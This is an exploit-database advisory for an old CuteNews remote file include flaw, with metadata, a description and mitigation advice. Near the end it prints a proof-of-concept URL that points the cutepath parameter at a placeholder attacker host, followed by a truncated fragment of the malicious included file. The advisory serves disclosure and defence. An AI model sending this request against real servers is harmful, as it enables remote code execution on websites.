CuteNews Remote File Include Vulnerability

vendor:

CuteNews

by:

SecurityFocus

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: CuteNews

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:cutephp:cutenews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

CuteNews Remote File Include Vulnerability

Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user-supplied input and restricting the types of files that can be included.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6935/info
  
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
  
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
  
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/cutenews/comments.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
  
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>